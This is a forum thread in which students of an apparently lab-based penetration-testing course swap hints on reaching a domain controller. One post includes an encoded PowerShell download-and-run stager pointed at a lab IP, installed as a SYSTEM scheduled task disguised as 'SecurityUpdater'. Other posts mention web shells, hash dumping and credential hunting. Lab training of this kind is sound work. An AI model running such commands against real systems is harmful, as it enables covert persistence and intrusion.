I’ve been stuck on trying to access DC02 for days now. Anyone willing to give me a tip? I’ve rooted the foothold host and pulled all the hashes I could find. Got access to the Admin account, but it’s only the local admin. Can’t seem to gain access to the one I need to get to DC02.
I’m stuck in the same place. Have you figured it out yet?
I haven’t reached the Skills Assessment yet. I am lost in the “Assumed breach” section, “Establishing persistence” part.
It says “We will focus on the approach used in the Probing the surface section by downloading a staged.txt file”
[!bash!]$ echo -en "iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=
And then create a scheduled task like this:
sliver (http-beacon) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr \"powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=\" /ru SYSTEM'
I did as was written but never got a shell back. Please help!
If anyone needs help to get the third flag, feel free to hit me up.
I’m stuck at the last, If anyone have a hint, I’d appreciate
PS: I got it. Took me direct access to the host via pivot. You can also achieve it with generating a file and PtT.
bro can you give a hint to get a foothold from htb-student lol i am stuck at the beginning tried everything
1 Like
Run Sharphound
1 Like
bro i stuck at 3rd question can you help me like how did you privoted to dc02
can you give a hint please?
Did you find the script?
yeah and logged in to mssql server but i am havind a error like when i am trying uplaod a file to mssql server it freezes
bro i already hot a dc02 but can’t dump hashes always error like implant timeout and after that session closes by itself
same as well its my second day on trying to get a foothold i tried everything and im getting runtime error whenever i visit the aspx shell in the uploads directory i tried everything possible plz help anybody
With mssqlclient.py I am getting login error for felipe without -windows-auth and with -windows-auth “The login is from an untrusted domain and cannot be used with Integrated authentication”. Any hints
Im stuck on the third flag please help lol!
At which part specifically?
Cant figure out how to get to the domain controller, bloodhound doesnt show a route.
I tried running inveigh to get the ntlmv2 hash, but im not getting anything, not sure if this is the correct route.
Have you found the PS1 script with the MSSQL user credentials?
No I haven’t, I logged in as the administrator, but didn’t see a powershell script 
Check “C:\Users\Administrator\Automation_Project”